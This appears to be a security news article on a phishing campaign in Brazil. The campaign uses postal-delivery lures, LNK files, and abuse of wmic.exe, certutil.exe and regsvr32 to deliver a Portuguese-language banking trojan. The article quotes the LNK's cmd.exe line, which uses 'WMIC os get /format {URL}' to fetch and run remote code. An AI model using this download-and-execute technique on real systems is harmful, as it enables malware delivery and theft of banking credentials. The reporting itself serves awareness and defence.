Researchers discovered a new malware that abusing two legitimate windows files and use it against compromised victims to steal sensitive information.
One file wmic.exe is a command line utility and the other file certutil.exe is a program that manages certificates for Windows.
These files are used for download the payload on the infected windows machine and also other files that later used for malicious purpose.
Attackers using more evasion techniques in this campaign and both files are already used by other malware but current attack integrate both files.
Researchers believe that the cybercriminals behind the malware attack using powerful tools and techniques to perform more stealthy operations.
The initial stage of infection starts from the malicious email campaign that targeting users along with urgency notification content of postal service of Brazil to trick users to click the links inside of the email that posed as users missed the postal delivery attempt.
Attacker trick user to click the embedded link by saying that they can find the more details by clicking the link.
Once the victims click the link and the new windows pop-up that attempts to download a malicious Zip file.
According to Trend Micro report,Once the zip file is downloaded and extracted, the user will be presented with an LNK file (detected as Trojan.LNK.DLOADR.AUSUJM). The LNK file will then point to cmd.exe using the following parameter:
/k start /MIN %WINDIR$\\system32\\wbem\\WMIC.exe os get /format {URL} && exit
The cmd.exe is responsible for executing wmic.exe via the following parameter:
os get /format {URL}
After the execution of cmd.exe attempt to download and execute the command from its command & control server.
It drops the copy of the Windows Files certutil.exe in the %temp% folder in a different name and the next process involved to make an attempt to communicate with the new C&C server to download a new set of files.
Here comes the main payload which detected as TSPY_GUILDMA.C by Trend Micro and the researchers believes that the payload shows that it is a banking malware that only works when the target’s language is set to Portuguese.
Finally, the Payload will be executed on victims machine using regsvr32.exe to steal banking information such as transaction details and login credentials.
Java Usage Tracker Critical Flaw Enable Hackers to Inject Arbitrary Files on Windows Systems
Cybersecurity experts have uncovered a new exploit leveraging the widely used Remote Desktop Protocol (RDP).…
Cybersecurity experts are sounding the alarm about a new SMS-based phishing tool, Devil-Traff, that is…
Experts at Wiz Research have identified a publicly exposed ClickHouse database belonging to DeepSeek, a…
The highly anticipated release of OPNsense 25.1 has officially arrived! Nicknamed "Ultimate Unicorn," this update…
Microsoft has officially added DeepSeek R1, an advanced AI model, to its Azure AI Foundry…
Researchers from the Georgia Institute of Technology and Ruhr University Bochum have uncovered two novel…